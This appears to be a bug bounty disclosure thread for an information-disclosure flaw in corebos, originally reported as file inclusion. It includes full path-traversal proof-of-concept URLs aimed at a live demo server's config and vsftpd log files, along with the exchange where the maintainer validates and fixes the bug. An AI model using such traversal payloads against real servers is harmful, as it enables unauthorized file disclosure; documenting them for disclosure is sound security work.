We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

PHP Remote File Inclusion in tsolucio/corebos

Valid

Reported on

Oct 31st 2021

Description

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).

Proof of Concept

// PoC.js

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Vulnerable Parameter --> file

Impact

This vulnerability is capable of... exposing or running files on the web server.

Joe Bordes
2 years ago

Maintainer

@shellinjector I can't reproduce this. I correctly get an invalid file error message. Can you make sure you indicated the link correctly?

Thanks

0x9x
2 years ago

Researcher

Sorry for confusion !

Actually i'm completly banned from the server ! let me check when changing the IP ! i'm not using any specific tool to do more testings here . but as you can see there is an Error that shows the full path of the server . Anyways let me check it next time .

Thanks

Joe Bordes
2 years ago

Maintainer

Ah, I understand now. The error is not that the file can be included/loaded/seen but that you can know if it exists or not, right?

It is a disclosure of information, not a remote file inclusion.

If that is the case I would ask you to reduce the severity and I will hide that information.

0x9x
2 years ago

Researcher

Sure! you're right !

Exist file and readable --> index.php

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Restriscted but exist --> config.inc & config

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/config.inc&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Thanks,

0x9x
2 years ago

Researcher

Other link ( full path of the server ) --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../var/log/vsftpd.log&ajax=true&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Joe Bordes validated this vulnerability 2 years ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
0x9x
2 years ago

Researcher

Thanks for your updates!

Joe Bordes marked this as fixed with commit c05cdd 2 years ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
Joe Bordes
2 years ago

Maintainer

Thanks for your help!

to join this conversation